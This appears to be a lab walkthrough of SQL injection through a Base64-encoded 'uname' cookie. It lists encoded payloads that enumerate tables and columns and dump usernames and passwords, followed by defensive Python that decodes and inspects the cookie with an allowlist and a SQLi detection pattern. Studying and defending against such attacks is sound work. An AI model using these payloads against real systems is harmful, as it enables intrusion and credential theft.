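After logging in successfully, capture the request in Burp Suite; the cookie value turns out to be encoded:
Decoding it in Burp Suite gives admin:
So every payload in the following steps must be Base64-encoded before it is injected.
Confirm that the injection type is single quote plus single parenthesis: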
Cookie: uname=YWEnKSM=
Dump the database name:
Cookie: uname=JyApIHVuaW9uIHNlbGVjdCAxLDIsZGF0YWJhc2UoKSM=
Enumerate the tables:
Cookie: uname=JykgdW5pb24gc2VsZWN0IDEsMixncm91cF9jb25jYXQodGFibGVfbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT0nc2VjdXJpdHknIw==
Enumerate the columns:
Cookie: uname=JykgdW5pb24gc2VsZWN0IDEsMixncm91cF9jb25jYXQoY29sdW1uX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLmNvbHVtbnMgd2hlcmUgdGFibGVfbmFtZT0ndXNlcnMnIw==
Dump the data:
Cookie: uname=JykgdW5pb24gc2VsZWN0IDEsMixncm91cF9jb25jYXQodXNlcm5hbWUscGFzc3dvcmQpIGZyb20gdXNlcnMj
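
The defensive counterpart to the steps above, as an added example that is not part of the original write-up: Base64 hides these values from signature matching on the raw header, so inspection has to decode the `uname` cookie first and then apply an allowlist. The function names and the username policy (1 to 32 characters from a restricted set) are assumptions.

```python
import base64
import binascii
import re

# Allowlist for a username; the 1-32 character policy is an assumption.
USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")
# Small signature set used only to label rejects for triage; the allowlist is the control.
SQLI_RE = re.compile(r"'|\)|#|--|\bunion\b|\bselect\b|information_schema", re.I)

def decode_uname(cookie_header):
    """Return the Base64-decoded uname cookie value, or None if absent or malformed."""
    m = re.search(r"(?:^|[;\s])uname=([^;\s]*)", cookie_header)
    if not m:
        return None
    try:
        # validate=True rejects characters outside the Base64 alphabet instead of skipping them.
        return base64.b64decode(m.group(1), validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None

def inspect(cookie_header):
    """Classify one Cookie header as 'ok', 'malformed', 'sqli' or 'rejected'."""
    value = decode_uname(cookie_header)
    if value is None:
        return "malformed"
    if USERNAME_RE.fullmatch(value):
        return "ok"
    return "sqli" if SQLI_RE.search(value) else "rejected"

def naive_inspect(cookie_header):
    """Signature match on the raw header with no decoding step, for comparison."""
    return "sqli" if SQLI_RE.search(cookie_header) else "ok"

# Sample headers: the first is constructed (Base64 of "admin"), the rest are from the page.
SAMPLES = [
    "Cookie: uname=YWRtaW4=",
    "Cookie: uname=YWEnKSM=",
    "Cookie: uname=JyApIHVuaW9uIHNlbGVjdCAxLDIsZGF0YWJhc2UoKSM=",
    "Cookie: uname=JykgdW5pb24gc2VsZWN0IDEsMixncm91cF9jb25jYXQodXNlcm5hbWUscGFzc3dvcmQpIGZyb20gdXNlcnMj",
]

if __name__ == "__main__":
    for header in SAMPLES:
        print(naive_inspect(header), inspect(header), repr(decode_uname(header)))
```

The allowlist only limits what reaches the application; the query that consumes the decoded value still needs to be parameterized.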